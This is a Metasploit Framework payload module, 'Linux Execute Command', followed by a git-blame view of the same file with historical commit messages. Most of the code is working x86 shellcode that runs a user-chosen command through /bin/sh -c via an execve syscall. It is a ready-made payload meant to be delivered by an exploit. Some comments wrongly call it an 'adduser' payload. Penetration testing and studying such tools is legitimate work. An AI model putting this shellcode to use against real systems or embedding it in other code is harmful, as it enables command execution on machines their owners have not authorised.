metasploit-framework/modules/payloads/singles/linux/x86/exec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Linux
	
	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Execute Command',
			'Version'       => '$Revision$',
			'Description'   => 'Execute an arbitrary command',
			'Author'        => 'vlad902',
			'License'       => MSF_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_X86))

		# Register adduser options
		register_options(
			[
				OptString.new('CMD',  [ true,  "The command string to execute" ]),
			], self.class)
	end

	#
	# Dynamically builds the adduser payload based on the user's options.
	#
	def generate_stage
		cmd     = datastore['CMD'] || ''
		payload =
			"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68" +
			"\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
			Rex::Arch::X86.call(cmd.length + 1) + cmd + "\x00"     +
			"\x57\x53\x89\xe1\xcd\x80"
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Patch from GML to fix call calculation git-svn-id: file:///home/svn/framework3/trunk@4438 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 22:38:54 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`require 'msf/core'`


			`###`
			`#`
			`# Exec`
			`# ----`
			`#`
			`# Executes an arbitrary command.`
			`#`
			`###`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`module Metasploit3`
fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00
			`include Msf::Payload::Single`
This adds a Linux-payload specific mixin which allows for new advanced options, such as setuid/chroot prepends. git-svn-id: file:///home/svn/framework3/trunk@4984 4d416f70-5f16-0410-b530-b9f4589650da 2007-06-09 02:25:31 +00:00			`include Msf::Payload::Linux`

fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Linux Execute Command',`
			`'Version' => '$Revision$',`
			`'Description' => 'Execute an arbitrary command',`
			`'Author' => 'vlad902',`
New licensing terms, revision bump to v3 git-svn-id: file:///home/svn/incoming/trunk@3425 4d416f70-5f16-0410-b530-b9f4589650da 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`'Platform' => 'linux',`
			`'Arch' => ARCH_X86))`

			`# Register adduser options`
			`register_options(`
			`[`
			`OptString.new('CMD', [ true, "The command string to execute" ]),`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`], self.class)`
fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`end`

			`#`
			`# Dynamically builds the adduser payload based on the user's options.`
			`#`
framework now properly handles using singles without handlers as both stages and singles, fixes #115 git-svn-id: file:///home/svn/framework3/trunk@4994 4d416f70-5f16-0410-b530-b9f4589650da 2007-06-16 05:04:03 +00:00			`def generate_stage`
fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`cmd = datastore['CMD'] \|\| ''`
			`payload =`
			`"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68" +`
			`"\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52" +`
Patch from GML to fix call calculation git-svn-id: file:///home/svn/framework3/trunk@4438 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 22:38:54 +00:00			`Rex::Arch::X86.call(cmd.length + 1) + cmd + "\x00" +`
fixed stager merging, made things a bit more pimply git-svn-id: file:///home/svn/incoming/trunk@2774 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-17 06:01:11 +00:00			`"\x57\x53\x89\xe1\xcd\x80"`
			`end`

Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-19 21:03:39 +00:00			`end`